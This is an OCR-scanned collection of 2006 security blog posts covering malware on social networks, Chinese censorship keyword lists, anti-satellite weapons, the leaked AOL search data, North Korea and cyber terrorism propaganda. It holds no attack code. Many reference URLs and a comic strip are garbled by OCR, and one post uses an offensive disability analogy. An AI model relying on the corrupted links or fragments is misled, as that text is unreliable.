6. 
7. 


ttp://ddanchev.blogspot.com/2006/01/still-worry-about-your-search-history.htm 
ttp://ddanchev. blogspot .com/2006/01/feds-google-msns-reaction-and-how-you. htm 


. http: //ddanchev. blogspot .com/2006/02/what-search-engines-know-or-may-find.htm 


ttp://ddanchev.blogspot.com/2006/03/security-vs-privacy-or-whats-left-from.htm 
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10. http: //ddanchev. blogspot .com/2006/05/snooping-on-historical-click-streams.htm 


11. http: //ddanchev.blogspot .com/2006/06/brace-yourself-aol-to-enter-security_09.htm 


2.8.11 Analyzing the Intelligence Analysts’ Factors of Productivity (2006-08-10 01:18) 


[1] * Outstanding perspective, given the author is an ex-ClA analyst himself. Controversial 
to the common wisdom of a Project Manhattan type of departamental seperation - everyone’s 
working to achieve the same goal, whereas no one knows what the others are doing - there’s 
a growing trend of better analyzing and responding to an intelligence analyst’s productivity 
needs. [2]Watchin’ the Analysts greatly descibes the [3]Intelligence Community’s efforts to 
sense and respond to these growing trends of collaboration, in between figuring out how to 
balance the possible security implications. Great reading, especially the infamous news head- 
line on how the [4]CIA got "hacked" through an internal unofficial communication chat room, 
one that they were unaware of by the time. The paper discusses [5]LinkedIn, [6]Del.icio.us, 
Blogs, and highlights the basic truth that "Anything You Can Do, I Can Do Meta..", an excerpt : 


"Analysts interact among themselves, as a complex community web of knowledge. Analysis 
of those sorts of networks would be worthwhile, and is being done in the commercial sector, 
through a variety of tools. In the fall of 2000, the CIA shut down a so-called “chat room” 
operating unofficially over Agency networks; four employees lost their jobs, with other 
employees and contractors given reprimands. | had left the Agency in 1994, but numerous 
of those involved were friends and former colleagues. My impression was that what occurred 
was more embarrassing than threatening, and that agency management ought to understand 
how and why such virtual communities form—whether they’re facilitated or frustrated by the 
“official” infrastructure—and appreciate their value. Various network visualization tools would 
have readily revealed anomalous (at least as far as official business was concerned) traffic, 
but analysts will want and need an environment that fosters creativity and community, and 
ought to be given one." 


However, there’s [7]a certain degree of internal censorship going on, the way employ- 
ers often have strict guidelines on employees blogging activities, the CIA recently fired an 
analyst over an internal blog posting related to the Geneva Convention and torture. [8]Risk 
management solutions, besides visualization are, of course, taking place as well. 


Related resources and posts: 

[9]Intelligence 

[10]Visualization, Intelligence and the Starlight Project 

[11]"IM me" a strike order 

[12]Covert Competitive Intelligence 

[13]India’s Espionage Leaks 

[14]Japan’s Reliance on U.S Spy Satellites and Early Warning Missile Systems 


1 

3 

4. 

5 

6 

7 
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8. http: //ddanchev. blogspot. com/2005/12/insiders-insights-trends-and-possible.htm 


9 
10, 
12. 
13 


14. http://ddanchev. blogspot .com/2006/07/japans-reliance-on-us-spy-satellites.htm 


2.8.12 Malware Statistics on Social Networking Sites (2006-08-10 02:11) 


[1] * Huge traffic aggregators such as the majority of social networking sites,attract not only 
huge percentage of the Internet’s population on a regular basis, but also malware authors tak- 
ing advantage of the medium as an infection vector - and why not as a propagation one as well? 


ScanSafe just came up with some nice stats on [2]the average number of social networking 
pages hosting malware - based on five billion web requests, there’s one piece of malware 
hosted in 600 social networking pages : 


"According to an analysis of more than five billion Web requests in July, ScanSafe found 
that on average, up to one in 600 profile pages on social-networking sites hosted some form of 
malware. The company also reported that the use of social-networking sites, often assumed 
to be popular only with teens, accounted for approximately 1 percent of all Web use in the 
workplace. “Social-networking sites have been newsworthy because of the concern over our 
children’s safety, but beyond unsafe contact with harmful adults, these sites are an emerging 
and potentially ripe threat vector that can expose children to harmful software,” said Eldar 
Tuvey, CEO and co-founder, ScanSafe. “Users are frequently subject to unwanted spyware and 
adware that can compromise their PCs, track online behavior and degrade PC performance.” 


SpiDynamics recent research into [3]Detecting, Analyzing, and Exploiting Intranet Applications 
using JavaScript , [4]Hacking RSS and Atom Feed Implementations, and the [5]countless web 
application vulnerabilities in popular portals turn this into a malware author’s wet dream come 
true. You can also go through my [6]key points on web application malware | made at the 
beginning of 2006, the "best" is yet to come. 


Related resources and posts: 

[7]Malware 

[8]Malware Targets Social Networks - podcast 
[9]The Current State of Web Application Worms 
[10]Web Application Email Harvesting Worm 


1, ft tip://photost blogger. con/blogger/1888/1778/1600/Vorn, Propagation.0.1.jpd 
_ http: //wvy.scansafe.net scansafe/nevs/story?id-129634 
ftp: //ewv apidyoanica.con/opitabe/ja-port-scand 

| hetp://wvy. epldynantics.con/assets/documonts/HackingFeeds_ pal 

| fttp://wob3.n84e14,vLinur,de/xes_resoarch, ht 

. http: //packetstormsecurity.org/papers/general/malware-trends. pdf 


ttp://del.icio.us/DDanchev/Malware 
ttp://www.eweek.com/article2/0, 1759, 1993753, 00.asp?kc=EWRSS03129TX1K0000614 


. http: //ddanchev.blogspot.com/2006/05/current-state-of-web-application-worms.htm 


2 
3 
4 
5 
6 
7 
8 
9 
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10. http: //ddanchev.blogspot .com/2006/06/web-application-email-harvesting-worm.htm 


2.8.13 China’s Internet Censorship Report 2006 (2006-08-11 16:59) 


[1] ™ Censorship is as bad, as looking directly into the sun which causes [2]blindness, 
and still remains the among the few key prerequisites for successfully running a [3]modern 
communism type of government, namely the leader’s appearance. And while it’s obvious that 
wearing eyeglasses is supposedly making you look smarter, I’m certain that it’s not reading 
on candles, but censorship that’s causing the overal [4]blindness of party members on average. 


Human Rights Watch [5]recently [6]reseased a [7]very comprehensive report on China’s 
Internet censorship philosophy, technologies, social implications and the business parties 
involved. 


Meanwhile, the blocked since 2002 [8]Blogger.com seems to be again accessible in China. 
A battle victory for free speech? Don’t be naive, the reason it’s still accessible is that they 
figured out how to censor what needs to be censored - reverse model consisting of allowing 
everything, and blocking as well as monitoring access to potentially dangerous blogs. Less 
negative public opinion for sure, a good indication on why [9]the Great Firewall has the poten- 
tial to get breached into from within. Here are key summaries of what made me an impression: 


01. [10]JURL de-listing on Google.cn, Yahoo! China, MSN Chinese and Baidu 


02. [11]Comparative keyword searches on Google.cn, Yahoo! China, MSN China, Baidu, 
Yahoo.com, MSN search and Google.com 


03. [12]The words you never see in Chinese cyberspace - courtesy of Chinese hackers 
located a document within the installation package of QQ instant messaging software : 


falun, sex, tianwang, cdjp, av, bignews, boxun, chinaliberal, chinamz, chinesenewsnet, 
cnd, creaders, dafa, dajiyuan, dfdz, dpp, falu, falun, falundafa, flg, freechina, freedom, freenet, 
GCD, gcd , hongzhi , hrichina , huanet , hypermart , incest , jiangdongriji , lihongzhi ,making 
, minghui , minghuinews , nacb , naive , nmis , paper , peacehall , playboy , renminbao 
, renmingbao , rfa , safeweb, sex , simple , svdc , taip , tibetalk , triangle , triangleboy , 
UltraSurf , unixbox , ustibet , voa, voachinese, wangce, wstaiji, xinsheng, yuming, zhengjian, 
zhengjianwang, zhenshanren, zhuanfalun 


04. [13]The Great Firewall of China: Keywords used to filter web content : 


Names of People 

Bao Tong, Chen Yonglin, Cui Yingjie, Ding Jiaban, Du Zhaoyong, Gao Jingyun, Gao Zhisheng, 
He Jiadong, He Weifang, Hu Xingdou, Hu Yuehua, Hua Guofeng, Huang Jingao, Jiang Mianheng, 
Jiang Yanyong, Jiang Zemin, Jiao Guobiao, Jin Zhong, Li Zhiying, Liang Yuncai, Liu Jianfeng, 
Liu Junning, Liu Xiabobo, Nie Shubin, Nie Shubin (repeated),Sun Dawu, Wang Binyu, Wang 
Lixiong, Xu Zhiyong, Yang Bin, Yang Dongping, Yu Jie, Zhang Weiying, Zhang Xingshui, Zhang 
Zuhua,Zhao Yan, Zhou Qing, Zhu Chenghu, Zhu Wenhu, Zi Yang (in English), Ziyang (in 
Chinese), Ziyang (in English), zzy (in English, abbreviation for Zhao Ziyang) 
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Chinese Politics 

17th party congress, Babaoshan,Beat [overthrow] the Central Propaganda Department, Blast 
the Central Propaganda Department, Block the road and demand back pay, Chief of the 
Finance Bureau, Children of high officials, China liberal (in English), Chinese Communist high 
officials, Denounce the Central Propaganda Department, Down with the Central Propaganda 
Department, Impeach, Lin Zhao Memorial Award, Patriots Alliance, Patriots Alliance (abbrevi- 
ated), Patriots Alliance Web, Police chase after and kill police, Pollution lawsuit, Procedures for 
dismissing an official, Red Terror, Set fires to force people to relocate, Sons of high officials, The 
Central Propaganda Department is the AIDS of Chinese society, Villagers fight with weapons, 
Wang Anshi’s reform and the fall of the Northern Song dynasty, Specific Issues and Events, Buy 
corpses, Cadres transferred from the military, Cashfiesta (English), Cat abuse, Changxin Coal 
Mountain, China Youth Daily staff evaluation system, Chinese orphanage, Chinese Yangshen 
Yizhi Gong, Demobilized soldiers transferred to other industries, Dongyang, Dongzhou, Fetus 
soup, Foot and mouth disease, Fuzhou pig case, Gaoxin Hospital, High-speed train petition, 
Hire a killer to murder one’s wife, Honghai Bay, Horseracing, Jinxin Pharmaceutical, Kelemayi, 
Linyi family planning, Market access system, Mascot, Military wages, No Friendlies, Prosecutor 
committed suicide, Pubu Ravine, Shanwei government, Suicide of deputy mayor, Suicide of 
Kuerle mayor, Swiss University of Finance, Taishi village, Top ten worst cities, Wanzhou, Weitan 
[Village], Zhang Chunxian welcomes supervision against corruption, Falun Gong 


Terms related to the banned Falun Gong spiritual movement, including phrases from 
its “NineCommentaries” manifesto against the Communist Party 

Chinese Communist Party brutally kills people, dajiyuan (in English), Defy the heavens, earth 
and nature. Mao Zedong, Epoch Times, Epoch Times (written with a different character), 
Epoch Times news Web site, Evaluate the Chinese Communist Party, Evaluate the Chinese 
Communist Party (abbreviated), falundafa (in English), flg (in English), Fozhan Qianshou Fa, 
Guantong Liangji Fa, In the Chinese Communist Party, common standards of humanity don’t 
exist, Li Hongzhi, lihongzhi (in English), Master Li, minghui (in English), Mother and daughter 
accused each other, and students and teachers became enemies, New Tang dynasty TV 
Station, Nine Commentaries, No. 1 evil cult in the world, Obedient citizens under its brutal 
rule, People become brutal in violence, Chinese Communist Party, People developed a concept 
of the Chinese Communist Party, but, People who could escape have escaped, and had people 
to seek refuge with, Quit the party, Run the opposite direction of the so-called ideals of 
Communism, Shenzhou Jiachifa, Spring Festival Gala of the World’s Chinese, Steal people’s 
painstaking work, Truth, Compassion, Tolerance [Falungong slogan], Zhenshanren (in English) 
[same slogan in English] 


Overseas Web Sites, Publications and Dissident Groups 

Century China Foundation, China Issues Forum, China Renaissance Forum, China Society 
Forum, China Spring, Chinese Current Affairs, Chinese World Forum, EastSouthWestNorth 
Forum, EastWestSouthNorth Forum, Forum of Wind, Rain and the Divine Land, Freedom and 
Democracy Forum, Freedom to Write Award, Great China Forum, Han Style, Huatong Current 
Affairs Forum, Huaxia Digest, Huayue Current Affairs Forum, Independent Chinese PEN Center, 
Jimaoxin Collection, Justice Party Forum, New Birth Web, New Observer Forum, North American 
Freedom Forum, reminbao (in English), remingbao (in English), Small Reference, Spring and 
Summer Forum, Voice of the People Forum, Worldwide Reader Forum, You Say | Say Forum, 
Zhengming Forum, Zhidian Jiangshan Forum, Zhongshan Wind and Rain Forum 


Taiwan 
Establish Taiwan Country Movement Organization, Great President Chen Shui-bian, Indepen- 
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dent League of Taiwan Youth, Independent Taiwan Association, New Party, Taiwan Freedom 
League, Taiwan Political Discussion Zone 


Ethnic Minorities 

East Turkestan, East Turkestan (abbreviated), Han-Hui conflicts [ethnic conflicts], Henan 
Zhongmu, Hui [muslim ethnic minority] rebellion, Hui village, Langcheng Gang, Nancheng 
Gang, Nanren Village, Tibet independence, Xinjiang independence, Zhongmu County 


Tiananmen Square 
Memoirs of June 4 participants, Redress June 4, Tiananmen videotape, Tiananmen incident, 
Tiananmen massacre, Tiananmen generation, World Economic Herald 


Censorship 
Cleaning and rectifying Web sites, China’s true content, Internet commentator, News blockade 


International 
Indonesia, North Korea falls out with China, Paris riots, Tsunami 


Other 

Armageddon, Bomb, Bug, Handmade pistol, Nuclear bomb, Wiretap, Chinese People Tell the 
Truth, Chinese People Justice and Evil, China Social Progressive Party, Chinese Truth Report, 
Dazhong Zhenren Zhenshi, Jingdongriji (English), Night talk of the Forbidden City, People’s 
Inside Information and Truth 


Take your time to understand the [14]Twisted Reality courtesy of [15]China’s Internet 
Censorship efforts, and learn more on [16]how to undermine censorship. 


Related resources and recent posts: 

[17]Censorship 

[18]China’s Interest of Censoring Mobile Communications 
[19]South Korea’s View on China’s Media Control and Censorship 


. http: //photos1. blogger. com/blogger/1933/1779/1600/Censorship.0. jpg 
. http: //photos1.blogger.com/blogger/1933/1779/1600/Censorship. gif 


1 
2 
3. http: //en.wikipedia.org/wiki/Communist_Party_of_China 
4. http: //www.hinduonnet . com/fline/f12207/images/20050408000905401 . jpg 
5. http: //hrw. org/chinese/docs/2006/08/09/china13961.htm 
6. http://www. hrw. org/reports/2006/china0806/ 

7. http: //www.hrw. org/reports/2006/china0806/china0806webwcover . pdf 
8. http://www. cio.com/blog_view. htm1?CID=23811 

9. http: //www. forbes. com/business/global/2006/0227/018A. html 
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. http: //ddanchev.blogspot.com/2006/07/chinas- interest-of-censoring-mobile.htm 
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. http://ddanchev. blogspot .com/2006/07/south-koreas-view-on-chinas-media.htm 


2.8.14 Anti Satellite Weapons (2006-08-12 03:01) 


[1] Continuing the discussion on the ongoing weaponization 
of space, and the consequently emerging space warfare arms race. Micro satellites directly 
matching other satellites trajectories, and taking advantage of high energy concentration in 
the form of lasers? For sure, but why bother [2]damaging an entire reconnaissance satellite 
when you can basically spray its lenses to prevent it from using its core function: 


"But the ability to operate autonomously near another satellite could also be used for of- 
fensive purposes, says Theresa Hitchens of the Center for Defense Information in Washington 
DC, US. If an ANGELS-like satellite were sent towards another country’s satellite, it could be 
used as a weapon, she says. "It’s not far fetched to think that you could equip such little 
satellites with radio frequency jammers or technologies to block image capability," she told 
New Scientist. For example, a mini satellite could spray paint on the lens of a satellite’s 
camera in order to blind it, she says. "There’s a huge potential for this to be used as an 
anti-satellite weapon of some sort." 


Quite a creative space provocation, isn’t it? 


Related resources and posts: 

[3]Anti Satellite Weapons 

[4]Anti Satellite Weapons @ FAS 

[5]ls a Space Warfare arms race really coming? 

[6]Weaponizing Space and the Emerging Space Warfare Arms Race 


1. http://photos1.blogger .com/blogger/1933/1779/1600/xss11. jpg 


2. http: //www.newscientistspace.com/article.ns?id=dn9674&éprint=true 


3. http://en.wikipedia. org/wiki/Anti-satellite_weapon 
4. http://www.fas.org/spp/military/program/asat/index.htm 
5. http: //ddanchev.blogspot.com/2006/03/is-space-warfare-arms-race-really .htm 


6. http: //ddanchev . blogspot . com/2006/07/weaponizing-space-and-emerging- space .htm 


2.8.15 Bed Time Reading - Symbian OS Platform Security: Software Development 
Using the Symbian OS Security Architecture (2006-08-12 03:21) 


[1] * Prr, did | hear someone start counting mobile malware samples, prr? 
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Try getting to know the OS itself, the main proof of concept faciliator representing to- 
day’s constantly growing mobile [2]malware family. A review of this [3]recommended bed 
time reading book : 


"Symbian OS is an advanced, customizable operating system, which is licensed by the 
world’s leading mobile phone manufacturers. The latest versions incorporate an enhanced 
security architecture designed to protect the interests of consumers, network operators and 
software developers. The new security architecture of Symbian OS v9 is relevant to all security 
practitioners and will influence the decisions made by every developer that uses Symbian 
OS in the creation of devices or add-on applications. Symbian OS Platform Security covers 
the essential concepts and presents the security features with accompanying code examples. 
This introductory book highlights and explains: 


* the benefits of platform security on mobile devices 

* key concepts that underlie the architecture, such as the core principles of ‘trust’, ‘capability 
and data ’caging’ 

* how to develop on a secure platform using real-world examples 

* an effective approach to writing secure applications, servers and plug-ins, using real-world 
examples 

* how to receive the full benefit of sharing data safely between applications 

* the importance of application certification and signing from the industry ‘gatekeepers’ of 
platform security 

* a market-oriented discussion of possible future developments in the field of mobile device 
security" 


, 


Malware authors indeed have [4]financial incentives to futher continue recompling pub- 
licly available PoC mobile malware source code, and it’s the purchasing/identification features 
phones, opening a car with an SMS, opening a door with an SMS, purchasing over an SMS or 
direct barcode scanning, mobile impersonation scams, harvesting phone numbers of infected 
victims, as well as unknowingly interacting with premium numbers are the things about to 
get directly abused - efficiently and automatically. And whereas there are more people on 
Earth with mobile phones compared to those with PCs, it doesn’t necessarily mean everyone’s 
having a smart phone - perhaps Bill Gates "remarkable" [5]cash on the poor proposition could 
soon undermine the [6] $100 laptop one. 


People are getting more aware on the social engineering basics of today’s mobile mal- 
ware, and running a mobile phone anti-virus would be nothing more than a marketer’s dream 
come true - end users positioning themselves as security savvy buyers. Mobile operators tend 
to have God’s eye view on their networks, therefore epidemics are far from reality, targeted 
attacks (events and places where the masses gather or pass by), and directly exploiting the 
lack of awareness in certain regions could make an impact. South Korea’s advances in mobile 
communications let its citizens have more phone bandwidth than an average ADSL user, 
but | would still have to see this getting abused at a level going beyond the sophisticated 
impersonation scams going on all the time. 


Worth taking your time to read this book, go through Chapter 1 discussing "[7]Why a 
Secure Platform?" is the basics of mobile devices security, as well. 


Related posts: 
[8]Privacy issues related to mobile and wireless Internet access 
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[9]Digital forensics - efficient data acquisition devices 
[10]The Cell-phone Industry and Privacy Advocates VS Cell Phone Tracking 
[11]Mobile Devices Hacking Through a Suitcase 


[12]Bed Time Reading - The Baby Business 
[13]Bed Time Reading - Rome Inc. 


1. http://photos1.blogger .com/blogger/1933/1779/1600/Symbian_0S_Security.0.jpg 


_http://adanchey blogspot. con/2006/08/nalvare~bot families technology-and. heal 
"http: //eu. wiley .con/VileyCDA/WileyTste/productCd-0470018828. heal 

_hep://wvy. symantec .con/aveenter/venc/data/ trojan. redbrovser a. ntl 

_http://wvy engadget .con/2006/01/80/gates-proposes-celiphones-as-alteruative-to-clpe/ 
_hetp://laptop.nedia. nit edu 

. http://eu.wiley.com/WileyCDA/WileyTitle/productCd-0470018828. htm] 


ttp://ddanchev.blogspot.com/2006/03/privacy-issues-related-to-mobile-and.htm 


ttp://ddanchev.blogspot.com/2006/04/digital-forensics-efficient-data.html 
10. http://ddanchev. blogspot .com/2006/05/cell-phone-industry-and-privacy.htm 
11. http://ddanchev. blogspot .com/2006/08/mobile-devices—hacking- through. htm 
12. http://ddanchev. blogspot .com/2006/05/bedtime-reading-baby- business .htm 
13. http://ddanchev. blogspot .com/2006/06/bedtime-reading-rome-inc.htm 


2.8.16 AOUs Search Queries Data Mined (2006-08-16 06:38) 


[1] 


DOGBERT CO NSULTS 


(MY DATA-MINING 


SOFTWARE HAS 
FOUND ANOTHER 


= IT SAYS Youve —\ | THEN IT SAYS, 
BEEN STEALING : "HA HA, THAT 


LUNCHES FROM THE WASN’T PUDDING!” | 


REFRIGERATOR IN ——— | [ 
4 \ 


scottadame2aolcom 


© 1999 United Feature Syndicate, inc. 


“) MESSAGE 5 THE BREAK 
| FROM GOD. | st ROOM. ( 


ic 


www.dilbert.com 


Copyright 9 2666 United Feature Syndicate, Inc. 


While one of [2]JAOL’s searchers was publicly identified, enthusiasts are [3]tweaking, and 
[4]randomly scrolling the then leaked, now publicly available search queries data. Here’s 
someone that’s neatly data mining and providing relevant summary of the top result sites, 
and the top keywords. [5]SEO Sleuth : 


"was created out of the recently released AOL search data. Welcome to the AOL Key- 
word Analyser. This tool provides insights that have never before been publically available on 
the web. | claim: First tool on the web as far as | know that allows you to view what keywords 
people searched for it in search engines. First time you can see how much organic traffic each 
site gets from a search engine. First opportunity the public can see how many clicks individual 
SERPs get." 


Surprising results speaking for the quality of the audience by themselves. Meanwhile, 
the [6]EFF is naturally taking actions. 
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Related posts: 
[7]Data mining, terrorism and security 
[8]Shots From the Wild - Terrorism Information Awareness Program Demo Portal 


1 

2 

3 

4. http: //projects . cocaman .net/ao1500k/ao1500k. swf 
s, htap://wwv.seceleuth, con/aited 

6. http: //action. eff org/aolsearci 

7. 

8 


2.8.17 On the Insecurities of Sun Tanning (2006-08-19 20:49) 


[1] * You definitely don’t need a CISSP certificate to blog on this one, just make sure you don’t 
forget that there should be a limit on everything, even the hugs on [2]the beach. 


. http: //photos1. blogger. com/blogger/1933/1779/1600/beach. jpg 


1 
2. http://www. howstuffworks.com/sunscreen. htm 


2.8.18 North Korea’s Strategic Developments and_ Financial Operations 
(2006-08-20 00:15) 


A\ 
I Jr ERE 
Fo Tze. 
- at least from a national security point of view - zone in Asia. North Korea seems to be taking 
[2]external provocations rather seriously, and feeling endangered for the colapse of its regime 
is actively working on its nuclear test sites development, disinformation in between for sure. 


According to a recent article at Reuters, [3]North Korea may be preparing nuclear bomb test : 
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[1] Catching up with the latest developments at the hottest 


"ABC reported the activity at the suspected test site included the unloading of large 
reels of cable outside an underground facility called Pungyee-yok in northeast North Korea. 
It said cables can be used in nuclear testing to connect an underground test site to outside 
observation equipment. The intelligence was brought to the attention of the White House 
last week, the report said. Fears about North Korea’s nuclear ambitions were exacerbated 
when Pyongyang defied international warnings and fired seven missiles into waters east of 
the Korean peninsula on July 5." 


Excluding an opinionated Weapons of Mass Deception expert’s interest in developments 
like these, speculations remain a powerful driving force for everyone involved. Consider a 
basic principle in life, it is often assumed that gathering together a bunch of handicapped 
people is the best solution for their "fragile" situation, compared to actually trying to integrate 
instead of isolate them. | find the same issue as the cornerstone when dealing with countries 
on purposely isolating themsleves, thus limiting the international accountability and ensuring 
the continuity of the twisted reality. 


Meanwhile, the U.S is actively working on closing down North Korean bank accounts, 
and worsening its relations with major financial institutions worldwide, in reseponse to which 
North Korea is diversifying and [4Jopenning accounts at 23 banks in 10 countries : 


"North Korea has opened accounts at 23 banks in 10 countries following the U.S. impo- 
sition of financial sanctions on a bank in Macau last year, a Japanese newspaper reported 
Saturday. The Sankei Shimbun said on its Web site the 10 countries include Vietnam, Mongolia 
and Russia, quoting sources familiar with North Korean affairs. In September, the United 
States banned all American financial institutions from transacting with a Macau-based bank, 
Banco Delta Asia, accusing it of aiding North Korea in circulation of counterfeit U.S. dollars 
allegedly printed in the communist state. The U.S. also confirmed last month that the Bank of 
China, a major Chinese lender, had frozen all of its North Korean accounts suspected of being 
connected with the North’s alleged counterfeiting activities." 


And while China is realizing its growing economic potential, thus [5]complying with such 
efforts as well, helping the enemies of your enemies still remain a fashionable concept in the 
[6]silent war. 


Related resources and posts: 

[7]Satellite Imagery of Pre-Launch and Post-Launch at the Taepodong Launch Facility and 
Affected Vegetation 

[8]A-Bomb North Korean Propaganda 

[9]North Korea - Turn On the Lights, Please 

[10]Japan’s Reliance on U.S Spy Satellites and Early Warning Missile Systems 

[11]Open Source North Korean IMINT Reloaded 

[12]North Korea’s Cyber Warfare Unit 121 


1. http://photos1. blogger .com/blogger/1933/1779/1600/catchy_north_korean_propaganda. jpg 
2. http://www.kcna.co.jp/item/2004/200407 /news07/26 . ht 
3 


http: //today.reuters.com/news/articlenews.aspx?type=topNews&storyID=2006- 08- 17T215903Z_01_N17323351_RTRUK 


OC_0_US-NUCLEAR-KOREA-NORTH. xm 


4. http://english.hani.co.kr/arti/english_edition/e_international/150335.htm 


5. http: //www.wsws.org/articles/2006/aug2006/kore-a19. shtm 
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6 
7 

2 

9. 
10. http: //ddanchev.blogspot .com/2006/07/japans-reliance-on-us-spy-satellites htm 
11. 

12. 


2.8.19 U.S Air Force on MySpace (2006-08-22 19:14) 


[1] * Seems like the [2]U.S Air Force is joining MySpace: 


"The Air Force profile will show users five video clips that the Recruiting Service says 
gives them “a behind-the-scenes look at the extraordinary things airmen accomplish every 
day,” according to a press release. Users will be able to view longer videos of airmen as 
they fly jets, call in air strikes, navigate satellites and jump out of airplanes, the service said. 
They also can vote on which commercial will kick off the Air Force’s new “Do Something 
Amazing” advertising campaign, scheduled for Sept. 18 during the FOX network’s “Prison 
Break” television show." 


It’s like using a Yahoo Group mailing list to break the ice and keep it teen-friendly. Now, 
teens all over the U.S know which buddy to avoid. I’m sure [3]Privacy advocates will pick this 
up shortly, given "someone" isn’t already [4]data mining MySpace profiles for [5]targeted 
propositions - of course they are. 


1. http: //photos1 . blogger . com/blogger/1933/1779/1600/flyer .1. jpg 

2. http: //www.airforcetimes.com/story .php?f£=1-292925- 2049378. php 

3. http://www. commondreams . org/headlines05/0624-03. htm 

4. hvep://tists.grok.org-uk/pipermail/full-disclosure/2006-Tuns/04767S tal 
5, itty: //wwconmosdrenas_ org/neadiiaee06/0117—12-be 


2.8.20 Virus Outbreak Response Time (2006-08-22 19:41) 


[1] * In a previous posts | discussed various [2]trends related to [3]malware families, and 
mentioned CipherTrust’s [4]Real Time PC Zombie Statistics. You might also be interested 
in IronPort’s [5]Virus Outbreak Response Times for the last 24 hours which currently tracks, 
lronPort themselves, Sophos, Trend Micro, Symantec, and McAfee. Although vendor’s bias 
often exist, let’s just say that self-serving statements can easily be verified by doing a little 
research on your own - it doesn’t cost a fortune to run a geographically diverse honeyfarm. 
However, what bothers me is the vendors’ constant claims on exchanging malware samples 
for the sake of keeping the E in front of E-Commerce, whereas response time "achievements" 
often get converted into marketing benchmarks to be achieved. [6]Protecting against known 
malware is far more complex than it seems, and it is often arguable whether zero day 
malware, or known malware has the highest impact when infecting both, corporate, and home 
PCs. Basically you have [7]powerful end users getting themselves infected with months old 
malware and later on collectively becoming capable of causing damage on a network that’s 
already aiming at achieving the proactive protection level. Ironic isn’t it? If detailed statistics 
truly matter, [8]VirusTotal has the potential to dominate the analysts community without bias. 
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Response times used to matter once, now it’s all up to [9]proactive protection [10]ap- 
proaches, and, of course, revenue generation from both sides. Moreover, sometimes even a 
[11]signature based approach doesn’t work, especially when it comes to [12]packet based or 
web application based malware. Avoid the signatures hype and start rethinking the concept 
of malware on demand, open source malware, and the growing trend of malicious software to 
disable an anti virus scanner, or its ability to actually obtain the latest signatures available. 


At the bottom line, [13]Jachieving ROSI when it comes to [14]false malware positives is 
yet another growing concern for the majority of enterprises wisely spending their security 
dollars. 


1. http://photos1 .blogger .com/blogger/1933/1779/1600/flu_virus. png 
. http: //ddanchev. blogspot. com/2006/08/future-in-malicious-code-2006. htm 
. http: //ddanchev. blogspot .com/2006/08/malware-bot-families-technology-and. htm 


ttp://ddanchev. blogspot .com/2006/06/real-time-pc-zombie-statistics .htm 


. http: //www.ironport.com/toc/ 


2 
3 
4 
5 
6. http: //ddanchev. blogspot .com/2006/07/anti-virus-signatures-update-it-could.htm 
7 
8 
9 


. http://ddanchev. blogspot .com/2006/07/splitting-botnets-bandwidth-capacity.htm 
. http: //www.virustotal.com/ 
. http: //http//www.viruslist.com/en/analysis?pubid=189801874 


14. http://www.av-test.org/down/papers/2005-11_vb_falsepos2. pdf 


2.8.21 Cyber Terrorism Communications and Propaganda (2006-08-22 20:39) 


[1] * Further expanding the previous discussion on [2]Tracking Down Internet Terrorist Propa- 
ganda, and patterns of [3]Arabic Extremist Group Forum Messages’ Characteristics, there’ve 
also been some recent developments on [4]Hezbollah’s never-ending use of U.S hosting com- 
panies asa 


media/communication/ fund raising/ recruitment/propaganda platform: 


"Hezbollah used the Broadwing Communications fiber-optic network to deliver its Al-Manar 
web site to the world last week after [5]finding a weaknessin a Broadwing customer's con- 
nection. When that happened, Hezbollah television’s web site was suddenly hosted, of all 
places, in Texas. When Broadwing discovered what had happened, they cut the T1 connection 
to their customer until the customer resolved the problems on its end, and the Al-Manar 
site disappeared back into the ether—only to pop up a few hourslater on a server in India. 
Hezbollah’s tactics are laid out in a brief [6]Time articlethat also discusses the people trying to 
shut Hezbollah down. And it’s not the people you might think. Those in the war and security 
business are no doubt involved, but some of the work is done by amateurs, as well. Volunteers 
from the Society for Internet Research track jihadi websites and tactics across the Internet, 
then alert domain registrars and web hosting companies to the presence of potentially illegal 
material on their servers." 


Al Manar TV has long been known for delivering Hezbollah’s PSYOPS through constantly 
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relocating its stream, but [7]information warfare capable enemies seem to be able to hijack 
the signal as it recently happened. Moreover, according to Haganah’s most recent [8]Table 
of American Internet Service Providers of Hezbollah - [9]detailed analyses - Register.com 
remains a popular choice. 


Cyber terrorism is a complex and often misunderstood term that originally emerged as 
the direct effect of [10]Techno Imperialism sentiments, and, of course, the balancing power 
of the Internet when it comes to [11]cyber warfare capabilities. In another great research 
[12]Cyber Terrorism: A Study of the Extent of Coverage in Computer Security Textbooks, 
the author summarized the most commonly encountered Cyber Terrorism categories and 
keywords, and discussed the different explanations of the term. As for Cyber terrorism, the 
first issue that comes to the mind of the average expert are the [13]SCADA systems whose IP 


based connectivity remains a growing concern for governments utilizing these. [14] ® Which 
is exactly the least issue to worry about, today’s Cyber terrorism is still maturing, tomorrow’s 
Cyber terrorism will be taking advantage of cyber warfare capabilities on demand or through 
direct recruitment/blackmailing practices of individuals capable of delivering them. [15]Here’s 
a neat table representing the maturity/evolution of Cyber terrorism . 


For the time being, propaganda and recruitment are so far the most indirect and popu- 
lar practices, whereas the concept itself is truly maturing thus becoming even more evident. 
Thankfully, various researchers are already actively combining [16]AI and various web crawl- 
ing approaches while analyzing the presence of terrorists on the web - and here’s a [17]good 
starting point. 


Related resources and posts: 

[18]Cyber Terrorism 

[19]Hacktivism 

[20]Information Warfare 

[21]Cyberterrorism - don’t stereotype and it’s there! 
[22]Cyberterrorism - recent developments 

[23]The Current, Emerging, and Future State of Hacktivism 
[24]Terrorist Social Network Analysis 

[25]Hacktivism Tensions - Israel vs Palestine Cyberwars 


4 i - 


2. : 

3. : i 

| http: //arstechnica.con/nevs.are/post/20060809-T455. nea 

5. : 

6, http://aiv. time con/tine/world/printout/0, $816, 1224278, 00. na 
8. 

9. 


1 
re 


ni 


ttp://www.theage.com.au/news/technology/israel-hacks-into-hezbollah-tv-radio/2006/08/02/1154198175078. ht 


10. jeep: //ddanchev blogspot. con/2006/06/vechno~ inperialiw-and-effect-of al 
, frep://Adanehey, blogepot, con/2006/05/whos-sho~in- cyberwarfare. bial 

12. ietp: //ows. jae. org/docunents/Vol3/3p279-269-150.paf 

_ http: //del. icio.us/DDanchev/ SCADA 


http: //photos1. blogger .com/blogger/1933/1779/1600/Cyberterrorism. jpg 


. http: //www.oii.ox.ac.uk/microsites/cybersafety/extensions/pdfs/papers/maura_conway . pdf 


. http://ai.arizona. edu/research/terror/publications/ISI_AILab_submission_final.pdf 


